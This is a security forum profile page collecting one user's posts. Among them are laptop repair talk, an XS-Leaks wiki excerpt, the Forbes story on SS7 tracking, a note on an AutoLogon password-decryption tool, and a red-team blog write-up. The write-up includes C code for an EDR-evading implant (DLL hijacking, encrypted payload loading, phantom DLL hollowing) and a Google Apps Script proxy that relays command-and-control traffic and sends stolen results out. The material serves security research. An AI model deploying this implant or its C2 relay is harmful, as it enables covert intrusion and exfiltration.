Jump to content

Nytro

Administrators
  • Posts

    18664
  • Joined

  • Last visited

  • Days Won

    683

Everything posted by Nytro

  1. This tool can extract/decrypt the password that was stored in the LSA by SysInternals AutoLogon. I made this to be used with Cobalt Strike's execute-assembly: Compiled with .NET 3.0 (Windows Vista's default)+. Needs to be run as SYSTEM. Not just as a high intgrity process because the special registry keys need are only visible to SYSTEM and can only be decyrpted by SYSTEM. Why? In order to support Kiosk mode Windows needs to keep the user's password in a reversable format. This was being kept at HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon under "DefaultUserName" and "DefaultPassword" . Autologon was updated to store the passwords in the LSA Secrets registry keys that are only visible to SYSTEM. keithga provided a binary that popped a Message but no source code or command line version. How it works Through pInvoke calls: LSAOpenPolicy() LsaRetrievePrivateData() Credits Reverse Engineered this: https://keithga.wordpress.com/2013/12/19/sysinternals-autologon-and-securely-encrypting-passwords/ Copy and Pasted EVERYTHING from here: https://www.pinvoke.net/default.aspx/advapi32/LsaOpenPolicy.html Icon from: https://icon-icons.com/icon/lock-secure-password/99595 SysInternals: https://docs.microsoft.com/en-us/sysinternals/downloads/autologon So thanks to who actually did the work: keithga, frohwalt Download Compiled Version HERE Sursa: https://github.com/securesean/DecryptAutoLogon
  2. XS-Leaks Wiki # Overview # Cross-site leaks (aka XS-Leaks, XSLeaks) are a class of vulnerabilities derived from side-channels 1 built into the web platform. They take advantage of the web’s core principle of composability, which allows websites to interact with each other, and abuse legitimate mechanisms 2 to infer information about the user. One way of looking at XS-Leaks is to highlight their similarity with cross-site request forgery (CSRF 3) techniques, with the main difference being that instead of allowing other websites to perform actions on behalf of a user, XS-Leaks can be used to infer information about a user. Browsers provide a wide variety of features to support interactions between different web applications; for example, they permit a website to load subresources, navigate, or send messages to another application. While such behaviors are generally constrained by security mechanisms built into the web platform (e.g. the same-origin policy), XS-Leaks take advantage of small pieces of information which are exposed during interactions between websites. The principle of an XS-Leak is to use such side-channels available on the web to reveal sensitive information about users, such as their data in other web applications, details about their local environment, or internal networks they are connected to. Cross-site oracles # The pieces of information used for an XS-Leak usually have a binary form and are referred to as “oracles”. Oracles generally answer with YES or NO to cleverly prepared questions in a way that is visible to an attacker. For example, an oracle can be asked: Does the word secret appear in the user’s search results in another web application? This question might be equivalent to asking: Does the query ?query=secret return an HTTP 200 status code? Since it is possible to detect the HTTP 200 status code with Error Events, this has the same effect as asking: Does loading a resource from ?query=secret in the application trigger the onload event? The above query could be repeated by an attacker for many different keywords, and as a result the answers could be used to infer sensitive information about the user’s data. Browsers provide a wide range of different APIs that, while well-intended, can end up leaking small amounts of cross-origin information. They are described in detail throughout this wiki. Example # Websites are not allowed to directly access data on other websites, but they can load resources from them and observe the side effects. For example, evil.com is forbidden from explicitly reading a response from bank.com, but evil.com can attempt to load a script from bank.com and determine whether or not it successfully loaded. Example Suppose that bank.com has an API endpoint that returns data about a user’s receipt for a given type of transaction. evil.com can attempt to load the URL bank.com/my_receipt?q=groceries as a script. By default, the browser attaches cookies when loading resources, so the request to bank.com will carry the user’s credentials. If the user has recently bought groceries, the script loads successfully with an HTTP 200 status code. If the user hasn’t bought groceries, the request fails to load with an HTTP 404 status code, which triggers an Error Event. By listening to the error event and repeating this approach with different queries, the attacker can infer a significant amount of information about the user’s transaction history. In the example above, two websites of two different origins (evil.com and bank.com) interacted through an API that browsers allow websites to use. This interaction didn’t exploit any vulnerabilities in the browser or in bank.com, but it still allowed evil.com to gain information about the user’s data on bank.com. Root cause of XS-Leaks # The root cause of most XS-Leaks is inherent to the design of the web. Oftentimes applications are vulnerable to some cross-site information leaks without having done anything wrong. It is challenging to fix the root cause of XS-Leaks at the browser level because in many cases doing so would break existing websites. For this reason, browsers are now implementing various Defense Mechanisms to overcome these difficulties. Many of these defenses require websites to opt in to a more restrictive security model, usually through the use of certain HTTP headers (e.g. Cross-Origin-Opener-Policy: same-origin), which often must be combined to achieve the desired outcome. We can distinguish different sources of XS-Leaks, such as: Browser APIs (e.g. Frame Counting and Timing Attacks) Browser implementation details and bugs (e.g. Connection Pooling and typeMustMatch) Hardware bugs (e.g. Speculative Execution Attacks 4) A little bit of history # XS-Leaks have long been part of the web platform; timing attacks to leak information about the user’s web activity have been known since at least 2000. This class of issues has steadily attracted more attention 5 as new techniques were found to increase their impact. In 2015, Gelernter and Herzberg published “Cross-Site Search Attacks” 6 which covered their work on exploiting timing attacks to implement high impact XS-Search attacks against web applications built by Google and Microsoft. Since then, more XS-Leak techniques have been discovered and tested. Recently, browsers have implemented a variety of new defense mechanisms that make it easier to protect applications from XS-Leaks. About this wiki # This wiki is meant to both introduce readers to XS-Leaks and serve as a reference guide for experienced researchers exploiting XS-Leaks. While this wiki contains information on many different techniques, new techniques are always emerging. Improvements, whether they add new techniques or expand existing pages, are always appreciated! Find out how you can contribute to this wiki and view the list of contributors in the Contributions article. References # Side Channel Vulnerabilities on the Web - Detection and Prevention, link ↩︎ In some cases, these features are maintained to preserve backwards compatibility. But, in other cases, new features are added to browsers regardless of the fact that they introduce potential cross-site leaks (e.g. Scroll to Text Fragment), as the benefits are considered to outweigh the downsides. ↩︎ Cross Site Request Forgery (CSRF), link ↩︎ Meltdown and Spectre, link ↩︎ Browser Side Channels, link ↩︎ Cross-Site Search Attacks, link ↩︎ Sursa: https://xsleaks.dev/#xs-leaks-wiki
  3. This video is an explanation of prototype pollution vulnerability in kibana that, in a super cool and very creative way, was used to achieve remote code execution in kibana software. Blogpost: https://research.securitum.com/protot... Researcher's twitter: https://twitter.com/SecurityMB Follow me on twitter: https://twitter.com/gregxsunday Timestamps: 00:00 Intro 00:34 Prototype pollution 02:27 Vulnerability discovery 04:14 Exploitation #rce #prototypePollution #cve-2019-7609
  4. Nytro

    Update Faker

    A website that shows "update screen" animations in your browsers, so you can put the browser in fullscreen and prank friends https://updatefaker.com/ F11
  5. Poate reusesti cu qemu, dar daca nu e ceva "facut", ar putea sa iti ia ceva timp sa il face sa mearga.
  6. Da, exact la acest video m-am uitat. Nu parea asa greu Bine, nu e tocmai mare inginerie, dar banuiesc ca trebuie ceva mai multa dexteritate, rabdare si experienta practica ca sa faci asa ceva.
  7. Da, are sens ce zici, dar multe ma depasesc. Astept sa vad cei de la service, par sa fie ok, sa se priceapa. In orice caz, am backup la date, deci nu e ceva critic pentru mine, de aceea nu prea ma agit. Sper sa nu fie vreun scurt-circuit pe acolo. Ideea e ca sunt 3 conectori "curcubeu" (cred) si cel putin unul, cel de la tastatura, e posibil sa nu il fi bagat cum trebuie ca desprinsesem o bucatica de plastic care il tinea acolo. Eu am bagat-o la loc, cat de cat ok, dar cine stie. Incerc sa ma mai uit pe Youtube la tutoriale, poate mai prind si eu cate ceva.
  8. Nu a fost nevoie sa scot vreun cablu de la monitor, ci doar niste mufe care ajungeau la tastatura/touchpad. Acum, eu sper ca le-am pus bine. Dar e in regula, daca e vreun scurtcircuit si ia ceva foc, ia foc la service
  9. Da, cred ca e primul punct. Am incercat sa misc usor de ele dar nu a functionat. A, mai era o chestie ciudata. Cand "apasam" incet pe tastatura, in partea de sus, se auzea un sunet ca si cum s-ar atinge un ventilator De topit nu ar trebui sa fie probleme, ca am desprins toata partea cu tastatura si asa "am lucrat". In cel mai rau caz crapam complet tastatura/touchpad, pe partea aceasta. Mentionez ca nu sunt la prima experienta de acest fel. La laptop-ul anterior am mai incercat ceva si tot nu a iesit bine... Concluzie: Imi vad de ale mele si fac ce ma pricep. NU ma mai bag la probleme hardware, poate doar daca e ceva extrem de simplu, dar nici asa nu imi mai vine sa ma risc.
  10. Da, interesanta ideea. Ma intrebam cum decripteaza traficul TLS, dar e mentionat ce poate prinde si TLS nu e printre ele, nu ar fi avut cum.
  11. Salut, am avut o problema cu tastatura de pe un Asus RoG G750, mai batran (dar inca in putere), pe care il am si am zis sa o schimb. Am facut comanda doar de tastatura (putea veni si cu palmrest dar am zis ca nu merita) si am incercat sa o montez. Skill-urile mele de hardware sunt spre 0 si nici dexteritatea nu ma ajuta. Dar am un sfat pentru voi: nu faceti asta! Partea cu demontatul nu e atat de grea, dar ca de fiecare data am ramas cu niste suruburi in plus. Cred ca cei care fac laptop vor sa faca misto de noi, cei neprofesionisti, si baga suruburi in plus, nu stiu ce e cu ei. Partea cu schimbatul tastaturii nu a fost insa asa usoara cum ma asteptam, are o mizerie de mecanism la care trebuie sa topesti cu un pistol de lipit multe bucatele de plastic sa o poti scoate si apoi trebuie sa pui plastic topit la loc. Avand un pistol de lipit, am umplut casa de fum si am dat-o jos pe cea veche. O "montez" eu pe cea noua dar nu am avut rabdare sa pun plastic topit in 200 de gaurele. Asta a insemnat ca tastatura nu sta cum trebuie, sta in interior Acum vine partea cea mai retardata: Montez eu laptop-ul, bag si eu cum pot niste porcarii de "chestii" care se conecteaza din palmrest si tastatura, pun totul cap la cap (teoretic) si ii dau drumul. Sunt fericit ca merge butonul de power, deci macar ceva merge dar se pare ca... monitorul nu se aprinde, ramane negru . Are cineva idee ce ar putea avea? Nu am umblat pe la firele care duc la monitor si am incercat sa am grija in general. Nu gasesc nicio explicatie. Intelegeam daca nu mergea noua tastatura sau touchpad-ul dar chiar nu ma asteptam sa nu se aprinda ecranul. PS: Acum laptop-ul e la "spital", la un service. Sper ca ei sa ii dea de cap, dar sunt curios ce am facut acolo.
  12. Salut, de ce vrei sa inveti programare? Vrei sa faci aplicatii web, de exemplu? Cred ca ar fi un bun inceput. Eu zic sa incepi prin a invata HTML si CSS. Nu sunt limbaje de programare, dar sunt necesare. Apoi cred ca poti invata JavaScript si sa le combini. Cred ca ar fi bine pentru inceput. Ca sa inveti: citeste o carte. Sau doua. Exista carti care acopera aceste subiecte impreuna, sau separat. Daca nu vrei sa folosesti carti, cauta niste tutoriale, dar sigura-te ca gasesti unele bune. Sunt miliarde pe acest subiect. Tot ce trebuie sa stii e putina engleza.
  13. HUMBLE BOOK BUNDLE: HACKING 101 BY NO STARCH PRESS We've teamed up with No Starch Press for our newest bundle with a wealth of great ebooks for you to enjoy!! Get ebooks like Metasploit, Web Security for Developers, Real-World Bug Hunting, and Black Hat Go. Plus, your purchase will support the National Coalition Against Censorship and the No Starch Press Foundation! US$655 WORTH OF AWESOME STUFF PAY €1 OR MORE DRM-FREE MULTI-FORMAT 13,165 BUNDLES SOLD GET THE BUNDLE TIME LEFT REMIND 17 days Supporting PAY €1 TO UNLOCK! Locked contentHacking: The Art of Exploitation, 2nd Edition Locked contentThe Car Hacker's Handbook: A Guide for the Penetration Tester Locked contentMetasploit: A Penetration Tester's Guide PAY €6.77 OR MORE TO ALSO UNLOCK! Locked contentPractical Malware Analysis: The Hands-On Guide to Dissecting Malicious Software Locked contentPenetration Testing: A Hands-On Introduction to Hacking Locked contentAttacking Network Protocols: A Hacker's Guide to Capture, Analysis, and Exploitation Locked contentPractical Packet Analysis, 3rd Edition: Using Wireshark to Solve Real-World Network Problems PAY €8.46 OR MORE TO ALSO UNLOCK! Locked contentPractical Binary Analysis: Build Your Own Linux Tools for Binary Instrumentation, Analysis, and Disassembly Locked contentMalware Data Science: Attack Detection and Attribution Locked contentLinux Basics for Hackers: Getting Started with Networking, Scripting, and Security in Kali Locked contentThe Linux Command Line, 2nd Edition: A Complete Introduction Locked contentSerious Cryptography: A Practical Introduction to Modern Encryption PAY €15.23 OR MORE TO ALSO UNLOCK! Locked contentRootkits and Bootkits: Reversing Modern Malware and Next Generation Threats Locked contentBlack Hat Go: Go Programming For Hackers and Pentesters Locked contentThe Hardware Hacker: Adventures in Making and Breaking Hardware Locked contentWeb Security for Developers: Real Threats, Practical Defense Locked contentFoundations of Information Security: A Straightforward Introduction Locked contentReal-World Bug Hunting: A Field Guide to Web Hacking SUPPORT CHARITY National Coalition Against Censorship The No Starch Press Foundation Sursa: https://www.humblebundle.com/books/hacking-101-no-starch-press-books
  14. Nu avem de ce sa ne facem griji deoarece dusmanii nu stiu ca nu avem bomba nucleara. Cautati pe Youtube "bomba nucleara" sa va convingeti.
  15. Nytro

    Fun stuff

    Atentie! Phishng-ul devine din ce in ce mai realist!
  16. Cel mai probabil nu vor exista. temporar. Va creste industria producatoare de "metale", agricultura ca sa nu murim de foame si in general acele "lucruri esentiale" pentru supravieture. Dar nu cred ca se va ajunge la asa ceva, nu e cazul in anii imediat urmatori. Poate sa fie cand se termina resursele planetei, nu stiu. Eu nu mi-as face griji pentru job ci pentru supravietuire. Mergem la tara si mancam zacusca 2-3 ani pana se termina.
  17. Nytro

    Fun stuff

    Tutorial algoritmi
  18. Poate omul a venit sa invete, haide sa incercam sa il ajutam. - Linux-ul este un sistem de operare, ca si acel Windows pe care il ai. Te ajuta sa faci ceva util cu calculatorul/laptopul, ca sa nu fie doar o caramida. - Pe Linux, ca si pe Windows, poti crea mai multi useri. Asa cum tu ai un cont pe Facebook/RST sau alte platforme, asa poti avea un cont, user, pe Linux - Userii de sistem de operare, mai putin comun pe Windows pentru mediul "de acasa", pot fi limitati. Adica un user normal, nu poate de exemplu instala programe - Pe Windows pot fi aceste limitari de asemenea. Dar exista un user, Administrator, care are permisiuni depline asupra sistemului de operare (de fapt nu e Administrator ci NT Authority/System, dar ideea e aceeasi). Acest user, Administrator, poate instala programe, crea sau sterge noi useri si face multe alte lucruri - Pe linux acest cont special, cu privilegii totale pe sistemul de operare se cheama "root". Cum am zice noi, romanii, acest root "taie si spanzura" Asa cum tu ai Windows pe calculator/laptop si ai un cont cu privilegii de Administrator, asa ai putea sa iti instalezi Linux in loc de Windows si sa ai "root". Dar nu e nevoie sa stergi Windows-ul, tehnologia a evoluat si poti rula cam orice sistem de operare, inclusiv Linux, in ceea ce se cheama "Masina Virtuala". Adica descarci un program ca VMWare Player sau VirtualBox si acestea, in "interiorul" lor, iti permit sa instalezi un alt sistem de operare fara sa pierzi nimic din ce ai. Astfel, poti instala simplu si rapid Linux intr-o masina virtuala. Cauta pe Google "How to install Ubuntu", unde Ubuntu e o versiune de Linux mai simplu de inteles, cu interfete grafice. Si asa poti invata Linux. Acum ca am stabilit ce e un "root", putem trece la problema ta. Tu vrei acest root cu un anumit motiv. Care ar fi acela? Daca ai gasit vreun tutorial de "hacking smechereste za boss cum sa faci miliarde" si acolo ai vazut de acest "root", ar trebui sa alegi o alta sursa de informatii. Nu credeam, sau cel putin speram, ca mai sunt la moda mizeriile astea care se faceau acum 20 de ani. Ca o completare, asa cum tu iti instalezi o masina virtuala cu Linux, asa multe persoane au sistemele Linux expuse in Internet. RST Forums este un exemplu. Este un server cu Linux, expus in Internet. Ceea ce inseamna ca noi, cei din echipa RST, ne putem conecta la el si sa avem "root". Ce facem cu el? Ne asiguram ca forumul merge cum trebuie, ca este actualizat si spargem NASA de 2-3 ori pe saptamana. Ok, am glumit la partea cu NASA. Deci nu facem nimic "interesant". Ce se poate intampla e ca "baieti rai" de pe Internet sa ghiceasca parola de root (nu te complica la RST, nu o sa mearga, nu stie nimeni cum il cheama pe cainele meu Rex care e si parola la "root"). Aceste persoane obtin acces la servere de pe Internet cu acces "root" (deplin) sau mai limitat. Ce pot sa faca? Sa aiba acces la ce date sunt pe acel server. Ce altceva? Sa il foloseasca ca sa faca diferite atacuri idioate, gen sa atace alte servere, sa trimita mail-uri cu spam sau multe alte porcarii. Cand am zis ca poti cumpara de la DigitalOcean sau Vultr un root cu 5 $ nu am glumit. Poti cumpara cu 5$ un VPS (Virtual Private Server), adica o masina virtuala expusa in Internet, te poti conecta la ea si loga ca "root" si sa faci ce vrei cu ea. E modalitatea cea mai simpla. Insa daca vrei sa faci "nasoale", cel mai probabil VPS-ul o sa fie inchis rapid. Sugestia mea e sa te gandesti daca "merita". Oare o sa sara milioanele de dolari pe tine daca faci asta? Probabil ca nu. Vine cu niste riscuri la pachet, merita? Probabil ca nu. Stii bine ce faci si stii cum sa te feresti sa nu fii prins? Probabil ca nu. Asadar, ca o concluzie, invata mai intai despre ce e vorba si o sa iti dai seama ca e o "mizerie".
  19. Cumperi unul cu 5$ de la DigitalOcean, Vultr sau alti provideri de VPS-uri. Iti vine parola pe mail sau o setezi din interfata web, te loghezi prin SSH si incepi sa "hachezi".
  20. This Surveillance Tool Can Find You With Just Your Telephone Number — And These 25 Countries Bought It, Warn Researchers Thomas Brewster Forbes Staff Cybersecurity Associate editor at Forbes, covering cybercrime, privacy, security and surveillance. A surveillance technology that can identify the location of a phone anywhere in the world in just seconds with only a telephone number has been sold to 25 countries, some with chequered records on human rights, according to research released Tuesday. The tech was supplied by the Israeli business Circles, claimed Citizen Lab, a University of Toronto organization that has long tracked the activities of surveillance companies. Circles is a sister company of NSO Group, an iPhone and Android spyware developer that is currently being sued by Facebook over attacks on the WhatsApp accounts of 1,400 users and has been criticized for selling to nations who went on to spy on activists, journalists and other citizens. According to Citizen Lab, the Circles tracking tool was detected in both Western, democratic countries, and nations with poor human rights records. The full list, according to Citizen Lab and neither confirmed nor denied by Circles, included: Australia, Belgium, Botswana, Chile, Denmark, Ecuador, El Salvador, Estonia, Equatorial Guinea, Guatemala, Honduras, Indonesia, Israel, Kenya, Malaysia, Mexico, Morocco, Nigeria, Peru, Serbia, Thailand, the United Arab Emirates (U.A.E.), Vietnam, Zambia, and Zimbabwe. Technology made by Circles, an Israeli intelligence provider, can find a person's phone with just their number. As many as 25 countries use it, leading to concerns about ethics. GETTY The technique used by the Circles snooping tech is known as Signaling System 7 (SS7) exploitation, a powerful yet difficult-to-detect tool in government spy arsenals. It’s named after the portion of the telecoms network that deals with cross-border functionality and billing. When, for instance, you travel to another country, the SS7 network is used to move your phone over to a partner telecoms provider and adjust billing accordingly. But should a surveillance vendor have access to SS7 networks, either via hacking or acquiring it, they can send commands to a subscriber’s “home network” falsely indicating the subscriber is roaming. That will, in turn, reveal their location, though only the coordinates of the cell tower closest to the phone. It may also be possible to intercept calls and texts through SS7 exploitation, though Circles technology is only for location detection, according to two industry sources. (According to trademark filings, it does have a technology called PixCell for “tapping into or intercepting targets' wireless, telephone, computer, and internet communications.”) If such a significant number of countries have bought access to the Circles tool, it would indicate that all can locate a phone, and its owner, at rapid speed. Marczak noted that one of the main selling points of the Circles tool was that it didn’t need cooperation from a telecoms company. If used by countries with lax rule of law and human rights controls, it could help repressive government surveillance agencies track targets across borders, without the need for a warrant, Citizen Lab researcher Bill Marczak warned. Many of the countries listed as likely Circles customers have a track record of using surveillance tools against dissidents and activists, Citizen Lab claimed. Forbes previously revealed Circles’ sales to Mexico, whilst others had reported on deals with the U.A.E., where it was alleged the company’s tools were used to carry out surveillance on the Emir of Qatar and the prime minister of Lebanon. The U.A.E., for instance, allegedly targeted the now imprisoned activist Ahmed Mansoor with malware from at least three different companies - NSO Group included - before arresting him in 2017. Mexico, meanwhile, “serially abused NSO Group’s Pegasus spyware” in targeting at least 25 reporters, human rights defenders, and the families of individuals killed or disappeared by cartels, according to previous Citizen Lab research. NSO has always stated that it works for legitimate government agencies on investigations into the worst kinds of crimes, and has an ethics committee that reviews contracts, though it cannot comment on the identity of its customers. “Given Circles' affiliation with NSO Group, and repeated spyware abuse by NSO customers, it's disappointing to see Western governments patronizing the company,” added Marczak. An NSO spokesperson gave Forbes a joint NSO and Circles response, stating: “NSO and Circles are separate companies within the same corporate family, both of which lead their industries in a commitment to ethical business and adhere to strict laws and regulations in every market in which they operate. As we have previously stated, Circles is involved in search and rescue and tactical geolocation technology. “We cannot comment on a report we have not seen. Given Citizen Lab’s track record, we imagine this will once again be based on inaccurate assumptions and without a full command of the facts. As ever, we find ourselves being asked to comment on an unpublished report from an organization with a predetermined agenda.” The spokesperson declined to comment on the countries listed by Citizen Lab as customers. Citizen Lab said it tracked down Circles customers by looking for a unique “fingerprint” on servers across the globe that helped them identify where the spy tool was deployed. That fingerprint was built on numerous data points, most significantly a web domain that was linked to Circles business, according to the full technical report. Spying in Circles Circles was an independent intelligence agency vendor up until 2014, when it was acquired by private equity company Francisco Partners for $130 million and merged into a larger surveillance company. That umbrella organization also included NSO Group. But Circles isn’t the only SS7 surveillance provider on the market. Cyprus-based Intellexa, set up by former Circles co-founder Tal Dilian, uses SS7 exploitation as one of its many tools to track a target. Israeli companies Verint, Rayzone and 1rstWAP offer similar services, according to one industry executive. Ability Inc., another Israeli firm, tried to take the tech global, but crashed out of the Nasdaq after failing to secure customers. Those providers’ days should, in theory, be numbered, if they stick to solely doing SS7 attacks. The flaws that allow SS7 attacks to take place have long been fixable. The attacks are only possible because SS7, in its original form, doesn’t require any authentication to guarantee the legitimacy and safety of messages traversing the network. It would require some effort by global telecoms networks to address the flaws, but some efforts have been made to patch the vulnerabilities. The U.K., for instance, recently proposed telecommunications security legislation that would grant a regulator the authority to ensure the nation’s networks are secure against SS7 attacks. Nevertheless, whilst those gaping holes remain open across global networks, government spies can continue to track anyone, anywhere, with just their phone number. Sursa: https://www.forbes.com/sites/thomasbrewster/2020/12/01/this-spy-tool-can-find-you-with-just-a-telephone-number-and-25-countries-own-it-warn-researchers/?sh=78620548331e
      • 1
      • Upvote
  21. DefCamp It's the final countdown for the #DefCamp #CTF! Only a few days left to sign up your team! We promise FUN, engagement, awesome prizes, and a memorable experience to add to your track record! Details + SIGN UP links below. https://dctf2020.cyberedu.ro/
  22. Hindering Threat Hunting, a tale of evasion in a restricted environment Written by: Borja Merino 24 November, 2020 It is both common and important for the development of a Red Team exercise to obtain information about the technologies and restrictions of the environment where our TTPs are going to be executed. This information mainly implies substantial changes in our modus operandi. Generally, one of these changes is to put aside known/public offensive tools and develop our own custom implants ad-hoc for the customer’s ecosystem, at the initial stages of infection where the chances of detection are high. The following case that we would like to share is a clear example of this type of exercise. In one of our clients, we did obtain information about the EDR (Endpoint Detection & Response) technology deployed and the network restrictions for outgoing connections, where only domains such as Google, Microsoft, etc. are allowed. After studying different approaches to bypass these restrictions, we proceed to develop a custom implant with the necessary capabilities to reach the BlackArrow C&C and carry out various post-exploitation actions without being detected. The following diagram represents the steps performed by the implant: Implant logic Step 1: DLL Order Hijacking It is known that the use of DLL Order Hijacking is still quite efficient not only with AVs but also against EDR technologies. It is no wonder that multiple actors have been using these evasion techniques for years. As an input vector for the exercise, we chose one of the binaries used in a recent campaign described by Dr. Web in his report “Study of the ShadowPad APT backdoor and its relation to PlugX” . Specifically, we used the legitimate binary TosBtKbd.exe signed by TOSHIBA CORPORATION that, as shown below, is susceptible to DLL order hijacking in its function 0x4024A0. DLL Order Hijacking (TosBtKbd.exe) As we can see in the image, the DLL “TosBtKbd.dll” is loaded, via LoadLibrary(), without specifying its full path, making it possible to load a harmful DLL. Notice that the SetTosBtKbdHook symbol is invoked immediately. Step 2: RC4 Decryption (reflective PE) Running TosBtKbd.exe will trigger the harmful actions through our DLL. The skeleton of this library is shown below. //#include "syscalls.h" //SysWhispers void __stdcall UnHookTosBtKbd(void) {} void __stdcall SetTosBtKbdHook(void) { char key[11]; stale(); //Get RC4 Key (TimeDateStamp DWORD value) DWORD ts = getKey(); if (ts == NULL) return; sprintf_s(key, "%X", ts); DWORD dwCount; //Get encrypted shellcode from resource PCHAR exec = getResource(&dwCount); if (exec != NULL) { //Decrypt shellcode decrypt(key, exec, &dwCount); //Lazy check (reflective loading stub) if ((exec[1] == 'Z') && (exec[2] == 'E')) { uint8_t* pMapBuf = nullptr, * pMappedCode = nullptr; uint64_t qwMapBufSize; //Phantom DLL hollowing //Ref: github.com/forrest-orr/phantom-dll-hollower-poc //bTxF <-- (check NtCreateTransaction on the system) if (HollowDLL(&pMapBuf, &qwMapBufSize, (const uint8_t*)exec, dwCount, &pMappedCode,bTxF)){ VirtualFree(exec, NULL, MEM_RELEASE); //Less obvious indirect call __asm { mov eax, pMappedCode push eax; ret } } } } } First of all, the stale() function is run. Its goal is to distract and confuse some machine learning checks and sandboxes that execute the DLL looking for malicious activity. By playing with the variable limit, we can get a delay of seconds/minutes before executing the malicious actions. double c(int num1) { return (16 / (num1 * pow(5.0, num1 * 1.0))); } double c1(int num1) { return (4 / (num1 * pow(249.0, num1 * 1.0))); } void stale() { // Stale code. Play with the "limit" var to look for a delay you feel happy with double limit = 100; int j = 0; double ans1 = 0.0; double ans2 = 0.0; int flag = 1; for (j = 1; j <= limit; j += 1) { if (flag == 1) { ans1 += c(j); ans2 += c1(j); flag = 0; } else { ans1 -= c(j); ans2 -= c1(j); flag = 1; } } printf("%f", ans1); } Afterwards, an embedded resource in the DLL will be loaded and decrypted using the Windows CryptoAPI. This resource is a binary encrypted with RC4 that implements the main logic of the implant, that is, to establish communication with our C&C and execute post-exploitation actions. Resource decryption (reflective PE) It has been observed that some EDRs exclusively upload the unknown binaries to their cloud-sandbox for analysis, which is why TosBtKbd.exe’s TimeDataStamp has been used as RC4 key. Using a key from a file header of the container process, will make necessary an analysis within the appropriate context to recover the decrypted binary, which translates into more time for a hunter or malware analyst to obtain artifacts of interest such as, for example, the IP or domain of our C&C. The following image shows the creation of the reflective PE from the binary compiled from Visual Studio using pe_to_shellcode (developed by security researcher Hasherezade). Note that later the binary is encrypted with RC4 using the TosBtKbd.exe’s TimeDataStamp. Reflective PE generation (RC4 encryption) Step 3: Phantom DLL In order to make memory hunting more difficult and as an alternative to the most common injection techniques, Phantom DLL Hollowing has been used. Using this approach, created by the researcher Forrest Orr, it is possible to execute the binary within a + RX section, making it very difficult to detect it using traditional tools based on RWX allocations or suspicious threads. In our case, the DLL used to make the phantom is aadauthhelper.dll, which was chosen based on the size of its .text section to house our reflective PE. You can notice the loader stub right at the beginning of that section (0x556C1000). RX section (aadauthhelper.dll) To start our implant’s execution, once the Hollowing DLL has been done, the classical cast of a function pointer (call eax) has been replaced with a less obvious indirect call: push eax, ret. //Phantom DLL hollowing //Ref: github.com/forrest-orr/phantom-dll-hollower-poc //bTxF <-- (check NtCreateTransaction on the system) if (HollowDLL(&pMapBuf, &qwMapBufSize, (const uint8_t*)exec, dwCount, &pMappedCode, bTxF)) { VirtualFree(exec, NULL, MEM_RELEASE); //Less obvious indirect call __asm { mov eax, pMappedCode push eax; ret } Step 4: C2 connections through Google Apps Script Perhaps, one of the trickiest parts of this exercise was the outgoing communications as it was a specially controlled environment. Regarding various alternatives, such as Domain-Fronting and similar techniques, we opted for something more “innovative”. In this context, we took an idea from a Forcepoint analysis on certain Carbanak TTPs where said actor abused the Google Apps Script to send and receive commands. Instead of using said platform as a command and control server, its scripting capabilities would be used to configure a proxy that allows us to reach our C&C. It should be noted that there are various offensive tools that already take advantage of this platform in a very similar way to the initial idea raised by the Red Team/Threat Hunting team at BlackArrow. However, given the small number of real incidents that make use of these TTPs, it was considered that it could be the most appropriate approach to test the filtering capabilities of our target. The result has been the development of a binary in C that makes use of the approach described in the following graphic. Connections through proxy (Google Apps Script) At first, our implant will launch a GET request (via HTTPS) in which it will embed, in one of its parameters, the URL of the C&C. This URL will be extracted from Google Apps Script and will act as an intermediary between the client’s communications and the control server. After receiving the first GET, our C&C will return a random 10-byte token to the client. This token ensures that the connection comes from a legitimate host. Periodically, the implant, via POST, will check for new jobs. The result of these jobs (ps, screenshot, getinfo, etc.) will be sent to our C&C encoded in base64. The code snippet belows shows the main loop in charge of managing the collection and sending of the results associated with each job. The runJob() function will be responsible for executing, through a switch case, each of the control commands and returning the result encoded in base64. void C2_jobs(HINTERNET hConnect, TCHAR* urlPost) { DWORD dwBytesRead; TCHAR* token = new char[BUFSIZ + 1]; const TCHAR* job = "/job"; TCHAR jobvalue[JSIZE]; TCHAR* urlJob, * urlTmp = NULL; payenc_t pEncoded; pEncoded.payenc = NULL; urlJob = concatenate((const TCHAR*)urlPost, (TCHAR*)"/job/"); while (true) { Sleep(timer); HINTERNET hHttpFile = HttpOpenRequest(hConnect, "POST", urlPost, NULL, NULL, NULL, INTERNET_FLAG_SECURE, NULL); if (!HttpSendRequest(hHttpFile, NULL, NULL, NULL, NULL)) return; if (!InternetReadFile(hHttpFile, token, BUFSIZ + 1, &dwBytesRead)) return; if (dwBytesRead != 0) { token[dwBytesRead] = 0; if (sscanf_s(token, "job=%[^\n]", jobvalue, sizeof jobvalue) == 1) { urlTmp = concatenate((const TCHAR*)urlJob, jobvalue); pEncoded = runJob(jobvalue); hHttpFile = HttpOpenRequest(hConnect, "POST", urlTmp, NULL, NULL, NULL, INTERNET_FLAG_SECURE, 0); if (!HttpSendRequest(hHttpFile, NULL, 0, pEncoded.payenc, pEncoded.size)) return; if (pEncoded.payenc != NULL) { free(pEncoded.payenc); pEncoded.payenc = NULL; } free(urlTmp); memset(jobvalue, '\0', JSIZE); } } } } The following code was used to manage connection in Google Apps Script proxy configuration: function doGet(e) { var url = decodeURIComponent(e.parameter.url); try { var response = UrlFetchApp.fetch(url); } catch (e) { return e.toString(); } var cookie = response.getAllHeaders()['Set-Cookie'] return ContentService.createTextOutput(cookie); } function doPost(e) { Logger.log('[+] Post Done!'); payload = ""; if(e.postData){ payload = e.postData.getDataAsString(); } else { Logger.log("[-] Post Error :(") payload = "!!Error"; } var options = { 'method' : 'post', 'payload' : payload }; var url = decodeURIComponent(e.parameter.url); try { var response = UrlFetchApp.fetch(url,options); } catch (e) { return e.toString(); } Logger.log('UrlFetch Response: %s',response); return ContentService.createTextOutput(response.getContentText()); } As we can see in the following image, the client, from the TosBtKbd.exe address space or, to be more exact, from the mapped view (image memory) linked with aadauthhelper.dll, will communicate with the script.google.com service allowing us to bypass the organization’s filtering countermeasures. Memory / Connections In the C&C part, a simple Python service was developed to manage the listeners and the various post-exploitation tasks. C&C server Below is a video of one of the proofs of concept run on a Windows 10 2004. Sursa: https://www.blackarrow.net/hindering-threat-hunting-a-tale-of-evasion-in-a-restricted-environment/
